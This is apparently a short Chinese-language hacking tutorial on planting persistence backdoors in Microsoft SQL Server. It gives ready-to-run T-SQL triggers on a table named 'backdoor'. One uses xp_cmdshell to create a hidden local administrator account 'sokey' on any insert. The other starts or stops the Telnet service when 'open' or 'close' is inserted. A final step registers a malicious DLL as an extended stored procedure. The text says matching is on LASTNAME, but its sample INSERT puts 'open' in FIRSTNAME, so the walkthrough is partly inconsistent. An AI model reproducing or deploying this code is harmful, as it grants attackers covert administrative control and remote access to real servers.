创建一个表
create table backdoor
(LASTNAME varchar(10),FIRSTNAME varchar(10))
创建一个触发器,当有任何字符输入到这个表当中在系统中建立超级用户
create TRIGGER TR_HACKER1 ON backdoor
AFTER INSERT
AS
BEGIN
EXECUTE SP_ADDEXTENDEDPROC ‘MASTER.DBO.XP_CMDSHELL’,’XPLOG70.DLL’–’XPSQL70.DLL’
EXECUTE MASTER.DBO.XP_CMDSHELL ‘net user sokey 123456 /add’
EXECUTE MASTER.DBO.XP_CMDSHELL ‘net localgroup administrators sokey /add’
end
创建一个触发器,当输入字符串在字段中等于open的时候开启TELNET,为CLOSE时候关闭TELNET.
当输入字符串在字段中等于open的时候开启TELNET,为CLOSE时候关闭TELNET.
CREATE TRIGGER TR_HACKER2 ON backdoor
AFTER INSERT
AS
BEGIN
DECLARE @P VARCHAR(50)
SELECT @P=(SELECT LASTNAME FROM INSERTED)
EXECUTE SP_ADDEXTENDEDPROC ‘MASTER.DBO.XP_CMDSHELL’,’XPLOG70.DLL’–’XPSQL70.DLL’
IF(@P LIKE ‘%OPEN%’)
EXECUTE MASTER.DBO.XP_CMDSHELL ‘NET START TELNET’
ELSE IF(@P LIKE ‘%CLOSE%’)
EXECUTE MASTER.DBO.XP_CMDSHELL ‘NET STOP TELNET’
END
插入字符
我匹配的字符是LASTNAME等于open,别的字符都不行的
INSERT INTO backdoor(LASTNAME,FIRSTNAME) VALUES(‘111’,’open’)
动态链接库后门
制作动态链接库移入到数据库的bin目录
执行
use master
EXECUTE/EXEC SP_ADDEXTENDEDPROC ‘模块名’